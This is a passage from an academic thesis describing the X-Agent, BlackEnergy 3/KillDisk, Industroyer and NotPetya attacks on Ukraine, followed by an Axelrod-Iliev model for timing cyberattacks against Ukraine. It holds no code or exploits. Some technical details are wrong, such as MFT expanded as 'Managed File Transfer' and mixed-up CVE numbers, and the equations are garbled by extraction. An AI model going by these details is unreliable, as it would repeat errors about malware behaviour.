ATP28, sofacy, Sednit, Pawn Storm, STRONTIUM…) has used the iOS X-Agent malware successfully in the past against political targets, such as the Polish government and the United
Nations.174 FANCY BEAR has been linked with “three distinctive attack vectors: spear phishing webmail with crafted word and excel documents attached, phishing websites hosted on typosquatted domains and malicious iFrames leading to Java and Flash zero-day exploits.”175 The
Slovak IT security company ESET identified iOS timestamps of X-Agent in November 2012 with certain aspects of the code used prior to the first identified X-Agent timestamp.176 The iOS X-
Agent malware was derived from the base codes used to first implement a Windows version which was then reimplemented on the Linux platform by the group FANCY BEAR.177 Since FANCY
BEAR has had a long history with attacking geopolitical targets and has been attributed to the use of X-Agent in past conflicts, and has the proficiency in manipulating the source code to use on different platforms, the use of X-Agent to infect the Попр-Д30.apk military application has been
172 CrowdStrike, “Use of FANCY BEAR Android Malware.” 173 Ibid. 174 “En Route with Sednit: Part 2: Observing the Comings and Goings.” ESET White Papers. October 2016. 175 Răzvan Benchea, Cristina Vatamanu, Alexandru Maximciuc and Victor Luncaşu. “APT28 Under the Scope: A Journey into Exfiltrating Intelligence and Government Information.” Bitdefender. 2015. 176 “En Route with Sednit,” ESET, 51. 177 “En Route with Sednit,” ESET, 53. 70
attributed to FANCY BEAR by Bitdefender and CrowdStrike Threat Assessment Group, as well as the SBU.178 While ESET states that “performing attribution in a serious and scientific manner is a hard problem…outside of the scope of ESET’s mission,”179 they do clearly attribute other versions of X-Agent to FANCY BEAR as well as observe that the group has the “ability to come up with brand-new zero-day vulnerabilities regularly.”180
This attack falls within the classification of a cyberattack as it had a geopolitical motivation and was perpetrated against the Ukrainian state. The group FANCY BEAR is thought to be working with the GRU, but no definitive links can be determined. The security group Bitdefender only recognizes that the members of the group are Russian speaking and are operating from Russia or a neighboring Russian speaking country.181 The timestamps for attacks suggests that the attackers are in these regions but also suggests that the attackers are an organized group, receiving funding, and are operational during typical working hours. This would suggest that there is an external source of funding so CrowdStrike suggests that the “tactical artillery force positioning intelligence by FANCY BEAR further supports [their] previous assessments that FANCY BEAR is likely affiliated with the GRU and works closely with Russian military forces.”182 While the link between FANCY BEAR and the GRU has not been fully proven, there is ample evidence to suggest that the attacks have been funded from an outside source and that the attacks attributed to
FANCY BEAR are in line with Russian policy and international interests. This attack can be designated as an act of cyber espionage because it is carried out by a non-state actor (possibly
178 CrowdStrike, “Use of FANCY BEAR Android Malware.” 179 “En Route with Sednit,” ESET, 48. 180 Ibid. 46 181 Benchea et al., “APT28 Under the Scope,” 5. 182 CrowdStrike, “Use of FANCY BEAR Android Malware.” 71
funded by a state actor), aimed at the collection of information and data within the scope of an ongoing crisis.
BlackEnergy 3/ Killdisk.
Both BlackEnergy 3 and Killdisk are different names of components of a single attack, but do not constitute the entire attack. The attack on the power grid was highly sophisticated and used technical components beyond the general scope of small time hacktivist groups. The attack began with a spear phishing attack that was aimed to allow access to the business networks of Ukrainian power distribution companies (oblenergos). Once the spear phishing attack was successful, the variant BlackEnergy 3 (BE3) was installed onto computers at each of the impacted oblenergos, by exploiting the vulnerability CVE-2014-4114 in the OLE package of Microsoft Word.183 Following the downloading of BE3, the malware is automatically programmed to create communication between a remote C&C and the infected computer. It is at this stage that the malware steals credentials from the business networks to later ensure lateral movement throughout the network as well as identifying virtual private networks (VPNs) that can be used to enter the Industrial
Control System (ICS) network on a larger scale.184 In preparation for carrying out the attack there was “the use of existing remote access tools within the environment or issuing commands directly from a remote station similar to an operator Human Machine Interface (HMI).”185
While the attack was in progress there was serial-to-ethernet communications devices that impacted firmware by uploading malicious code. This was most likely developed prior to the attack as all malicious firmware was uploaded within a short period of time across the oblenergos.186 In
183 Udi Shamir, “Analyzing a New Variant of BlackEnergy3: Likely Insider Based Execution.” SentinelOne. 26 January 2016. 1. 184 Robert Lee, Michael J. Assante and Tim Conway. “TLP: White Analysis of the Cyber Attack on the Ukrainian Power Grid: defense Use Case.” Washington D.C.: SANS E-ISAC. March 18, 2016. 6. 185 Lee, et al., “White Analysis of the Cyber Attack,” 6. 186 Ibid. 7. 72
the final stage of the attack the attackers used “a modified KillDisk to erase the master boot record of impacted organization systems as well as to target and delete specific logs.”187 This variant of
KillDisk malware rendered systems inoperable by corrupting the master boot record.188 The attackers then used the HMIs to utilize the “Uninterruptable Power Supplies (UPS) systems to implement a service outage.”189 Further, during the attack there was a DDoS attack on the call center to disrupt customers from reporting the outages. The attack impacted approximately
225,000 customers and lasted for approximately 3 hours.190 It is thought that the zero-day exploit persisted in the network for 6 months before the attack became kinetic.191
While the Sentinel One article concludes that there must have been insider help because the CVE-2014-1441 vulnerability was patched in Office 2013 and subsequent Office applications, this is unconfirmed.192 The patch of those vulnerable macros, which is used in exploit CVE-2014-
4114, disables that macros, but it is able to be reenabled when administration privileges prompt the user to do so. All aspects of the attack, including reinstalling macros, could be done remotely or by prompting a legitimate user to reinstall them through a phishing attack, for which there was evidence. There is a high likelihood that when prompted to turn on the macros needed to install
BE3 onto the target computer, the legitimate user did not understand the request and naively allowed access. There were no deaths specifically attributed to the attack, and no persons were reported dying from lack of electricity or house temperatures dropping.193 However, this attack is
187 Lee, et al., “White Analysis of the Cyber Attack,” 7. 188 ICS-CERT. Cyber-Attack Against Ukrainian Critical Infrastructure. Alert (IR-ALERT-H-16-056-01). Washington, D.C. (Original Release date: February 25, 2016). 189 Ibid. 190 Ibid. 191 Lee, et al., “White Analysis of the Cyber Attack,” 3. 192 Shamir, “Analyzing a New Variant of BlackEnergy3,” 1. 193 ICS-CERT. (IR-ALERT-H-16-056-01). 73
the first of its kind to affect the civilian population substantially, as well as have an important effect on the critical infrastructure of a state.
Attribution of the attack is largely based on circumstantial evidence and no definitive case has been made against a state or other group. Shortly after the attack the SBU released a statement that reported the attack was carried out by the GRU but these accusations came before any investigations had come to a close.194 Throughout 2017 the SBU reported the existence of connections between hackers operating against Ukraine and the Russian government but none of the press releases substantiate the claims.195 In a 2016 FireEye report written in conjunction with iSight, a connection is made between BE3 and Sandworm Team, a known group operating on a pro-Russian political platform, and is believed to have Kremlin connections.196 Other versions of
BlackEnergy include a known tool used by Sandworm Team since 2014, who has run sophisticated malware campaigns using different variants of BlackEnergy.197 Further, the professionalism of the attack, and the ability for the attackers to pull off a sophisticated attack with little to no problems in the code structures or from the firewall’s defenses indicates that there were tests run beforehand to know how the code would operate.198 However, besides the Sandworm team being comprised of Russian speakers operating from either Russia or a Russian border state, the persons operating on Sandworm Team are unknown. Further, while there has been accusation from the SBU that
Russia is funding Sandworm Team but there is no definitive proof that the team has been funded
194 SBU Press Centre. “Russian Hackers plan energy subversion in Ukraine.” 28 December 2015. https://www.ukrinform.net/rubric-crime/1937899-russian-hackers-plan-energy-subversion-in-ukraine.html# 195 Ibid. Further press releases can be found at the following links: https://ssu.gov.ua/en/news/1/category/1/view/4250#.jRADsgAt.dpbs and https://ssu.gov.ua/en/news/1/category/1/view/4431#.ecmaqYxm.dpbs 196 Andy Greenberg. “How an entire nation became Russia’s test lab for Cyber War.” Wired. June 20, 2017. https://www.wired.com/story/russian-hackers-attack-ukraine/ 197 ICS-CERT. Ongoing Sophisticated Malware Campaign Compromising ICS (Update E). Alert (ICS-ALERT-14-281-01E). Washington D.C. December 10, 2014. Last revised December 9, 2016. 198 Lee, et al., “White Analysis of the Cyber Attack,” 5. 74
by the GRU. Although circumstantial evidence points to the alignment of Sandworm Team and the GRU, the Sandworm Team itself is implicated through the use of BlackEnergy 3.199
This attack can be classified as a cyberattack because of its perpetration against a state that is coupled with a security intent or national security focus. Further this attack is aimed to manipulate, corrupt and destroy computer systems on the civilian and military level. Since there were only three oblenergos targeted there is the possibility that there was an alternative motive other than instilling fear in civilians. While this would change the nature of the attack, the SBU and other experts generally assume that there was no a military aspect to this attack, although there was determination of purposeful military intent behind the BlackEnergy3/KillDisk power outages.
Alternatively, the attacks could have been carried out by another actor, for a political reason, intended to instill terror or to spurn government action. Thus, these attacks can be classified as cyber terrorism. This attack cannot be classified as cyber espionage as there was no coding that would be used to steal data. The attack cannot be cyber warfare because it was not designed to do serious harm, and ties to a state-funded operation appear limited.
CrashOverride/Industroyer.
CrashOverride/Industroyer is the name given to the malicious software that was used on 17
December 2016 to attack the Ukrainian electric grid. This attack was more sophisticated than the
BlackEnergy3/KillDisk attack the previous year and had a wider impact on military, government and civilian infrastructure. The attack began through a backdoor, installed by authenticating its existence via a local proxy. It is unknown how this initial backdoor is introduced to the computer system since there was no record found of phishing emails as in the 2015 attack. However, once
199 John Hultquist. “Sandworm Team and the Ukrainian Power Authority Attacks,” iSight, 11 January 2016. 75
infected on one system, it self-replicates to other computers. The malware communicates repeatedly, without pause, until a connection is established.200 Once the connection is established it installs an additional backdoor that masquerades as a legitimate Windows Notepad
Application.201 This extra backdoor is deployed in case the initial backdoor is discovered or patched. It can then be used to download payloads from a remote C&C. The initial backdoor also downloads the launcher component and is able to create and name blank mutex objects.202 There was no component found that could relay information back to the C&C for espionage purposes.203
The launcher component is responsible for beginning the payloads and then launching the data wiper component. Several payloads were identified, from two different forensic investigations, which were uploaded from the launcher component and used to execute the attack.
The first identified was the 101 payload component, which is based on international standard IEC 101 which “describes a protocol for monitoring and controlling electric power systems.”204 This payload component masquerades as the control of the RTU device which can then turn Initial Operation Assessment’s off and on with a serial line communicating one bit at a time. The next identified payload is the 104 payload, which also operated based on an international standard. This payload is easily configurable and “can be customized by the attackers or different infrastructures.”205 While this payload is similar to the 101 payload, it does not communicate serially and “kills the legitimate master process” on the infected host.206 The 104 payload also has the ability to change the mode of RTU IOAs. The 61850 payload component was not dependent,
200 Dragos Incorporated. “CRASHOVERRIDE: Analysis of the Threat to Electronic Grid Operations.” Published, 2017. https://dragos.com/blog/crashoverride/CrashOverride-01.pdf 201 Ibid. 202 Ibid. 15. 203 Ibid. 15. 204 Anton Cherepanov. “Win32/Industroyer: A New Threat for Industrial Control Systems.” ESET. 12 June 2017. 205 Chrepanov, “Win32/Industroyer,” 7. 206 Dragos Incorporated, “CRASHOVERRIDE,” 17. 76
can stand alone, and is based on the IEC 61850 standard that “describes a protocol used for multivendor communication among devices that perform protection, automation, metering, monitoring and control of electrical substation automation systems.”207 This payload automatically discovers relevant devices on the network by sending connection requests. If the request, is accepted, the 61850 payload then continues sending requests to the specific IP address until it can discern if the IP is from a logical node used to control circuit breakers and switches.208 The OPC
DA (Open Platform Communication) (Data Access) payload is responsible for “real-time data exchange between components, based on a client-server model” and exists as a “stand alone malicious tool.”209 When executed it looks for specific markers naming OPC items. The final component is the data wiper, which is a destructive model for the final stage of attack that is launched 1-2 hours prior to the termination of the attack and executes itself when the attack time is up. The data wiper is aimed at making attribution of the attack more difficult. Other components of the CrashOverride/Industroyer included a Port Scanner Tool, used to map the network and find relevant computers and a DoS Tool which rendered devices unresponsive until they are rebooted manually.210
This family of malware is designed to specifically attack industrial electric grids and use of the malware requires sophisticated knowledge of both the code structure and how the electric grids are configured. Both the Drogos and ESET reports are focused on the attack structure and do not focus on attribution. After the attack there was little indication of the perpetrator behind the attacks, although the similarities between the 2015 and 2016 attacks brought accusations against
207 Cherepanov, “Win32/Industroyer,” 10. 208 Ibid. 11. 209 Ibid. 12. 210 Ibid AND Dragos Incorporated, “CRASHOVERRIDE.” 77
Russia and Russian Security Services.211 The attack’s data wiper component makes it difficult to attribute the attack to a specific group but the Sandworm Team has been labeled responsible.212
Attribution of the CrashOverride/Industroyer attack to Sandworm Team is even more circumstantial than the attribution of the BlackEnergy3/KillDisk attack.
Since this attack is nearly impossible to attribute, classification is nearly impossible.
However, it cannot be deemed to be cyberwarfare because the attack was not made to create a long-lasting effect on the electrical grid. Although the code could be altered to create a widescale meltdown of electric grids in future attacks, the Ukrainian attack did not do so despite the attackers having the opportunity. Thus, is appears clear that the attack was not made to create serious harm to persons or strategic objects. After the attack was completed, the electrical grid was not destroyed, but there were delays for some sectors, such as the railways and mines, to again become operational and continue operations at normal levels. Further, since there is no hard evidence that this was perpetrated by a state or a state funded group, this effectively rules out the possibility of cyber warfare. This attack cannot be classified as cyber espionage because the code had no payload which would communicate information to a remote C&C. However, since the goal of the attack was to temporarily disable the electric grid, this can be labeled an act of cyber terrorism because there was no definitive military or government target. However, due to the interconnected nature of the grid, civilian, governmental and military infrastructure was compromised.
211 Greenberg, “Russia’s test lab for Cyber War.” 212 Kim Zetter, “The Ukrainian Power Grid Was Hacked Again,” Vice News, 10 January 2017. https://motherboard.vice.com/en_us/article/bmvkn4/ukrainian-power-station-hacking-december-2016-report 78
NotPetya.
NotPetya is the name of a cyberattack that initially attacked Ukraine but subsequently spread across the globe. Its name is because it was originally thought to be ransomware known as Petya, first discovered in 2016. While NotPetya is a version of Petya ransomware that was used as a data wiper rather than as ransomware. The infected computer would show a screen demanding a payout in Bitcoin but, upon payment, would not return the data because it had already been permanently deleted at the onset of the ransomware screen. Additionally, it has the ability to self-circulate across networks, making it difficult to stop from spreading.213 It utilizes the CVE-2017-0144 vulnerability in the SMB (Service Message Block) service to propagate, an exploit known as EternalBlue, developed by the U.S. National Security Agency and leaked in April of 2017.214 This is the same vulnerability that was used successfully in the WannaCry ransomware outbreak that took place in
May 2017. NotPetya can also spread across networks through SMB copy and remote execution or Network node enumeration.215
The attack begins by infecting a machine with NotPetya through the exploit. After the malware is installed on a device, it drops a ransomware DLL (Dynamic Library Link) that allows the malware to execute processes on other systems as it takes over the command execution of the machine. Following this, the malware uses hashes to determine the processes running on the system and tries to gain various privileges on the device. Any level of privileges can be obtained, and if they are, credential theft is not executed. If credential theft is necessary to gain access to the locked privileges, the malware will gain the credentials by creating a PeekNamedPipe that can
213 Karan Sood and Shaun Hurley, “NotPetya Technical Analysis- A Triple Threat: File Encryption, MFT Encryption , Credential Theft,” CrowdStrike, June 29, 2017. https://www.crowdstrike.com/blog/petrwrap-ransomware-technical-analysis-triple-threat- file-encryption-mft-encryption-credential-theft/ 214 Lily Hay Newman, “The Leasked NSA Spy Tool that Hacked the World,” Wired, March 7, 2018. https://www.wired.com/story/eternalblue-leaked-nsa-spy-tool-hacked-world/ 215 Sood and Hurley, “NotPetya Technical Analysis.” 79
grab credential information and then send it to the NotPetya malware via the pipe. Impersonation can than commence if the required privilege is granted through the previous steps. If impersonation is possible, the SMB copy is executed remotely. It is after this that the malware attempts to propagate across the network or to new networks through network node enumeration, SMB copy and remote execution or SMB exploitation using the EternalBlue vulnerability.216
The malware then attempts to connect to the server using credentials stolen from the infected machine. If the server is infected, then the malware will spread through all machines connected to the server. At this point, the ransomware manipulates the Master Boot Record
(MBR), which is responsible for the identification of the operating system and houses code that functions as a loader for the operating system. NotPetya does not corrupt the MBR, but rather overwrites it with its own custom boot loader allowing it to hide its tracks as well as execute the rest of the ransomware. After the MBR is overwritten, it encrypts the Managed File Transfer
(MFT) responsible for secure internal and external data transfers. This allows the malware to display a false check screen warning of a disk error, telling the user to not turn off their PC. During this, NotPetya encrypts Sector 33, which is used as an integrity check for decryption, destroying the key and causing a disk reboot. After the reboot, a screen appears announcing that that all files have been encrypted and a payment of Bitcoin is required to purchase a key to decrypt the files.
While the Petya ransomware has the possibility to recover files, plugging a key into NotPetya will cause further damage and will not recover the lost files. Instead it will encrypt individual files and then give the user a false installation key. Files are unable to be recovered and the entire server is
216 Sood and Hurley, “NotPetya Technical Analysis.” 80
compromised. NotPetya employs anti-forensic measures to zero out its file contents and delete itself from the disk.217
This attack originated in Kyiv, Ukraine at a small software business called Linkos Group.
The Group is responsible for routine updates to M.E.Doc, an accounting program used by most businesses and private citizens to complete their taxes. However, on June 27, 2017, it was the servers at Linkos group that launched the NotPetya malware across Ukraine, and subsequently the world. By hacking the update servers of Linkos Group, alleged Russian state hackers were able to send NotPetya to PCs around the world that had M.E.Doc installed. The malware quickly spread and took down machines.218 Once it was recognized on a computer it was too late, files were already destroyed, and the malware was already spreading to other devices on the server.
Throughout Ukraine it was estimated that 10 percent of all computers were wiped of data. The malware wiped data from a large portion of Ukrainian infrastructure, including 4 hospitals in Kyiv,
6 power companies, 2 airports, 22 banks including their ATM networks and card payment systems, retail and transport card information and almost every Ukrainian federal agency.219 The second largest bank in Ukraine, Oschadbank, had 90 percent of all bank computers compromised.220
This malware spread from Ukraine to other countries, institutions and industries. It was recorded in 64 countries including the United States, Brazil, Denmark, and even Russia.221 The far reaching and uncontrollable malware was found in hospitals in Pennsylvania, in a French construction company Saint-Gobain, on the computers at a chocolate factory in Tasmania, and
217 Sood and Hurley, “NotPetya Technical Analysis.” 218 Andy Greenberg, “The Untold Story of NotPetya, the Most Devastating Cyberattack in History,” Wired, 22 August 2018. https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/ 219 Ibid. 220 Ibid. 221 Olena Goncharova, Oksana Grytsenko and Denys Krasnikov, “Ukraine finds itself at the epicenter of global cyber attack,” Kyiv Post, 30 Jun 2017. https://www.pressreader.com/ukraine/kyiv-post/20170630/281741269437161 81
infected in some of the largest companies in the world such as the shipping giant Maersk, the
Russian oil giant RosNeft, the medical supplier Merck and FedEx subsidiary TNT Express.222 It was estimated that companies and government agencies spent over $10B USD dollars in damages from the NotPetya attack, with some companies having to deal with a halt in production or services for months following. The shipping giant Maersk had to “reinstall 4,000 servers, 45,000 PCs, and
2,500 applications…over ten days.”223 It cost Maersk alone over $200M USD an additional $264M
USD in quarterly revenue loss, caused a backlog at marine terminals, with no way for the workers on the ground to contact the headquarters, and a large amount of product sat in container warehouses or was lost, waiting for Maersk to come back online.224
The attack has been attributed to Russian state hackers but the fact that RosNeft was a victim of NotPetya gives plausible deniability to the Kremlin.225 However, the method in which the malware was disseminated is a tactic that has been used by Russian government hackers previously, most notably in the BE3/Killdisk and CrashOverride/Industroyer attacks against critical infrastructure in 2015 and 2016, respectively. The code was created without an express military or governmental target and was uncontrollable, snaking its way through the systems to infect a large amount of infrastructure and industry outside of Ukraine. This attack cannot be considered cyber warfare because it was not a kinetic attack and did not lead to death or destruction that would parallel a physical act of war. This attack’s primary goal of deleting information means it cannot be considered strictly cyber espionage. This attack would fall under the category of cyber
222 Andy Greenberg, “The Untold Story of NotPetya, the Most Devastating Cyberattack in History,” Wired, 22 August 2018. https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/ 223 Charlie Osborne, “NotPetya ransomware forced Maersk to reinstall 4000 servers, 45000 PCs,” 26 January 2018. Zero Day Net. Zdnet.com. https://www.zdnet.com/article/maersk-forced-to-reinstall-4000-servers-45000-pcs-due-to-notpetya-attack/ 224 Lee Mathews, “Ransomware Attack Cost Shipping Giant Maersk Over 200 Million,” Forbes, 16 August 2017. https://www.forbes.com/sites/leemathews/2017/08/16/notpetya-ransomware-attack-cost-shipping-giant-maersk-over-200- million/#71b0f5574f9a 225 Ellen Nakashima, “Russian military was behind ‘NotPetya’ cyberattack in Ukraine, CIA concludes,” The Washington Post. 12 January 2018. 82
terrorism because it had no clear goal of disrupting government or military structures and was used as an indiscriminate weapon.
Summary.
The Ukrainian Crisis has included the Maidan Revolution, the annexation of Crimea and the ongoing war in Donbas. Prior to the Maidan Revolution cyberattacks were generally unsophisticated and were thought to be perpetrated primarily through non-state actors. Since the violence during the Maidan revolution increased, so did targeted cyberattacks of the opposition, largely through cyber espionage and information warfare. The annexation of Crimea was assisted by cyberattacks that cut off mainland Ukraine from the Crimean Peninsula, forcing Crimean citizens to rely on the unmarked soldiers that took over the streets and government buildings. After the annexation of Crimea, Luhansk and Donetsk declared themselves independent and similar unmarked troops appeared in the regions to support the separatists.
International pressure against Russia had little to no effect on the proceeding war that unfolded, and physical attacks throughout the eastern regions of Ukraine continued and were coupled with cyberattacks against critical infrastructure. As the Crisis continues, attacks become more sophisticated in nature and affect a larger population of Ukraine and have the potential to spill over to have international repercussions. Through all of the stages of the Crisis the use of cyber capabilities in conjunction with conventional warfare tactics makes the Ukrainian Crisis a unique conflict to study while attempting to understand hybrid warfare and the interconnected roles of cyber and physical warfare. In addition, the Ukrainian Crisis is a study that is beneficial to understanding what dynamic arises between large and small states within an era where a new method of waging war, cyber, is employed. 83
5 DETERMINING OPTIMAL TIMING
Prediction in the social sciences has always had an aspect of uncertainty surrounding it due to the uncertainty of human nature. Political science and international relations scholarly research is often heavily focused on theory and qualitative analysis rather than quantitative analysis.
However, the prediction of trends in warfare is a tool that can be used in conjunction with theory and qualitative analysis in international relations. There are many formulas used for prediction, from regression analysis and other types of trend analysis, as will be discussed in Chapter 6, to mathematical formalisms, as discussed in this chapter.
Wu et al. creates a cyberattack prediction model based on a Bayesian network model. In their work they use the vulnerabilities in the network, the value of assets in the network and the usage condition of the network to determine attack probabilities.226 Experimental results show that the coupling of major environmental factors and a Bayesian network model produces more accurate results. While Bayesian models are not the approach used here, the concept of using major physical factors as a driving force in cyber prediction is a concept upon which this thesis is based.
Jaganathan et al. focus on the vulnerabilities of a network, where the model is applied for defensive, rather than offensive, strategies, but assumes access to reliable data on structure, vulnerabilities and traffic within the network.227 This model uses the Common Vulnerability
Scoring System (CVSS) and studies how CVSS impacts, or is impacted by, network vulnerabilities and traffic. Previous work in the area of prediction models demonstrate the importance of
226 Wu Jinyu, Lihua Yin and Yunchuan Guo. “Cyber Attacks Prediction Model Based on Bayesian Network.” IEEE Security and Privacy Workshops (2012). 227 Venkatesh Jaganathan, Priyesh Cherurveettil and Premapriya Muthu Sivashanmugam. “Using a Prediction Model to Manage Cyber Security Threats.” The Scientific World Journal 2015. Tamilnadu: Hindawi Publishing Corporation (2015). 84
analyzing how different aspects of a conflict affect seemingly unrelated aspects of the same conflict.228
This chapter operationalizes the equation presented by Robert Axelrod and Rumen Iliev in their 2014 paper “Timing of Cyber Conflict,” created to decide “when to use a [cyber] resource to exploit a vulnerability.”229 The model was created to determine when “the trade-off between waiting until the stakes of the present situation are high enough to warrant the use of the cyber resource, but not waiting so long that the vulnerability is discovered and patched.”230
5.1 The Axelrod-Iliev Model
The Axelrod-Iliev model was chosen instead of others because it provides more lenient constraints on the information needed to compute the optimal timing of an attack. Working outside of the Ukrainian system, access to specific and detailed knowledge of the vulnerabilities of the system designs is limited so operationalizing other prediction models, such as a Bayesian model, is unlikely to provide verifiable results. For many models, data collection is hampered by government secrecy and lack of access, while the Axelrod-Iliev model is not bogged down by data collection difficulties. Further, the Axelrod -Iliev model considers social aspects that other models neglect, or deem less important, and is primarily focused on the situational risk surrounding an attack. Although this equation was created from the attacker’s viewpoint and was only operationalized through retrospective analysis, it will, while determining the offensive capabilities of Russia, be used to determine the most probable timing of cyberattack against Ukraine. The final reason for the use of this model is its assertion that “when stakes are constant the optimum policy
228 Geographical, minorities, time, resources. 229 Axelrod and Iliev, “Timing of Cyber Conflict,” 1298. 230 Ibid. 85
is to use a cyber resource as soon and as long as possible.”231 State perception of stakes almost wholly defines this equation so this is an approach that is beneficial in ongoing conflicts, such as the Ukrainian Crisis.
Before presenting the equation itself, we provide a description of the parameters and variables used by Axelrod-Iliev. The equation defines a specific value (V) that defines the overall future value of using a cyberattack. It is based on the persistence (P), which is “the probability that if you refrain from using a resource now it will still be usable in the next time period.”232 This can be stated as a conditional probability Pr(resource survives without use) denoted as Pr(resource survives | not used). The stealth (S) is the conditional probability that a resource survives if it is used and is denoted as Pr(resource survives | used). Axelrod and Iliev argue that the timing of the use of a cyber weapon should be based on the what is at stake (s) and what is the Threshold of stakes (T), which is the point at which you should use the resource.233 This occurs when the gain from using the resource exceeds some average threshold G(T). Finally, the potential payoff from the use of a resource diminishes with time so a discount rate (w) is applied in the formulation.
Thus, to operationalize the equation for use in the Ukrainian Crises the following formulation is adopted, which is the Axelrod-Iliev equation:
푉 = 푃푟(푠 ≥ 푇)(퐺(푇) + 푤푆푉) + (1 − 푃푟(푠 ≥ 푇))푤푃푉 which can be simplified as follows:
= 푃푟(푠 ≥ 푇)퐺(푇) / [(1 − 푤푃) + 푃푟(푠 ≥ 푇 )푤(푃 − 푆)]
231 Axelrod and Iliev, “Timing of Cyber Attack,” 1300. 232 Ibid. 1299. 233 Ibid. 1300. 86
This equation has been applied to data from the Ukrainian Crisis so all values have been compiled through information collected on the cyberattacks in the ongoing war. The five cyberattacks introduced in Chapter 4: Operation Armagedon, FANCY BEAR X-Agent,
BlackEnergy 3/KillDisk and CarshOverride/Industroyer, and NotPetya, are used to determine the
Persistence of the attacks in Ukraine.
5.2 Applying the Axelrod-Iliev
Persistence is further defined by 푃 = 푆(2), based on the assumption that if a resource remains unused, its ability to remain undetected for a further remainder of time is doubled. Since the calculations concerning the Ukrainian Crisis are from a data set where stealth and persistence only comprise of 5 Ukrainian cyberattacks, the confidence in the sample is low. Unfortunately, the confidence interval is wide, meaning there is low certainty in the numbers calculated.
The model requires Persistence to be stated as a probability. To change the number of days each malware was in the system into a probability, the mean and standard deviation of length of the population of cyberattacks in days was needed to create a curve which could then be used to date the attacks against Ukraine. To determine the standard deviation and mean the data presented in the 2012 paper “Before We Knew It: An Empirical Study of Zero-day Attacks in the Real
World” by Leyla Bilge and Tudor Dumitras is adopted.234 Calculating the mean and standard deviation is accomplished by calculating the duration of each attack, beginning with the Attack
Start Date and concluding with the Disclosure Date, omitting the Disclosure Date in the total number of days, to get the length of each attack in days. The duration of days of the 18 zero-day attacks, presented in Table 1, will be used to calculate the mean and the standard deviation of the
234 Bilge, Leyla and Tudor Dumitras. “Before we Knew it: An Empirical Study of Zero-Day Attacks in the Real World.” CCS. North Carolina: Symantec Research Labs, October 2012. 87
duration of attacks.235 Those two factors will then be used to determine the probability of the attacks against Ukraine, as required by the Axelrod-Iliev equation.
For this thesis the mean and standard deviation are calculated using the 18 data points given in Chart 1. It is noteworthy that Bilge and Dumitras identify the mean as 312 days, which is different than the calculations undertaken in this work. The 312 days is referenced by Axelrod and
Iliev as the average number of days malware can exist in a system before it is discovered. However, based on the 18 data points available here, the calculated mean is 380.89 days (rounded to 381 days) without removing the outliers or 372 days when they are removed. Although this differs from those reported earlier, it is possible that they either removed outliers or used a geometric mean in their calculations. The impact of outlier removal would have a highly variable impact on the calculations because the decision of what constitutes an outlier is often subjective. If a geometric mean was used, it will result in lower “mean” value by virtue of the nature of the calculation itself (i.e. it is the nth root of the product of the n data points) rather than the arithmetic mean, which is based on a linear calculation of the sum of the n data points.
Although this means the earlier work is not directly comparable with these results, it does not impact on the core findings reported in the following.
235 Blige and Dumitas, “Before we Knew it.” 7. 88
Table 1: The Zero-day vulnerabilities236
Name Attack Start Date Disclosure Date Number of days CVE 2008-0015 28 December 2008 6 July 2009 190 CVE 2008-2249 14 October 2008 9 December 2009 421 CVE 2008-4250 5 February 2008 23 October 2008 261 CVE 2009-0084 23 October 2008 14 April 2009 173 CVE 2009-0561 11 January 2009 9 June 2009 149 CVE 2009-0658 2 September 2008 20 February 2009 171 CVE 2009-1134 25 June 2008 9 July 2009 329 CVE 2009-2501 7 January 2009 13 October 2009 279 CVE 2009-3126 27 January 2009 13 October 2009 259 CVE 2009-4324 15 March 2009 14 December 2009 274 CVE 2010-0028 14 October 2008 10 February 2010 484 CVE 2010-0480 26 March 2010 14 April 2010 19 CVE 2010-1241 29 November 2008 11 April 2010 498 CVE 2010-2568 13 February 2008 17 July 2010 885 CVE 2010-2862 5 March 2009 4 August 2010 517 CVE 2010-2883 14 December 2008 8 September 2010 633 CVE 2011-0618 3 January 2010 13 May 2011 495 CVE 2011-1331 19 March 2009 16 June 2011 819
Calculating Persistence (P)
To determine optimal timing of a cyberattack using the Axelrod-Iliev formula, both stealth and persistence are reached by averaging Ukrainian cyberattacks, as discussed above. Calculating
236 Blige and Dumitas, “Before we Knew it.” 89
optimal timing based on Stealth (S) requires 푆 = 푃/2, and the calculation of the Persistence using
Table 2, rows 1-5 was calculated to have µ = 398.
Operationalization of µ = 398 is completed by setting the mean of the Ukrainian attacks on a curve with the entire population. Table 1 shows the 18 zero-day attacks from which the mean and standard deviation was derived after removing the high and low outliers (푚 = 372 and 휎 =
190). From the population mean and standard deviation it is possible to calculate the z-score to determine where µ = 398 lies on the curve by percentile.
To determine the z-score, we use the formula: 푥 − µ푝표푝 푧 = 휎푝표푝
Therefore:
398 − 372 푧 = 190
푧 = 0.137
Using a Z-score chart,237 the proportion (∝) of values lower than µ = 398 is ∝= 0.5557, which means that µ = 398 is in the 55.57 percentile of the population of cyberattacks. Persistence is operationalized as the value .5557.
This means that a cyberattack perpetrated against Ukraine has a 55 percent chance of survival if not used. What should be determined from this is the optimal timing to use an exploit that fit the mean parameters of all cyberattacks in Ukraine. From this, the risk level can be determined when it is generally most beneficial to use an exploit against Ukraine.
237 “Z Table,” University of Florida, last accessed March 16, 2019. http://www.stat.ufl.edu/~athienit/Tables/Ztable.pdf 90
Table 2: Attacks on Ukraine
Name Attack Start Date Disclosure Date Number of Days X-Agent 28 April 20131 21 December 20141 602 Operation Armagedon 26 June 2013 3 April 2015 646 Black Energy 3/KillDisk 23 June 20151 23 December 2015 183 CrashOverride/ Industroyer July 20151 17 December 2016 ~ 519 NotPetya 18 May 20171 27 June 2017 40
Calculating Stealth (S)
Stealth can be defined as “the probability that if you use a resource now it will still be usable in the next time period.”238 This is also defied by Axelrod and Iliev as: Pr (resource survives with using it). Stealth is further defined by 푆 = 푃/2, based on the assumption that once a resource is used, its ability to remain undetected for a further remainder of time is cut in half. Following the assumed formula of 푆 = 푃/2, the following is true:
푆 = 0.5557/2
푆 = 0.2779
Calculating Threshold (T)
The Threshold can be defined simply as “the threshold that will cause you to use the resource.”239 The lower the threshold the more often the resource can be used but there will be a lower average gain in its use. A threshold of 푇 = 1 means that the resource should always be used, whereas a threshold of 푇 = 6 means that a resource should not be used until needed. 푇 is also an
238 Axelrod and Iliev, “Timing of Cyber Attack.” 239 Ibid. 1299. 91
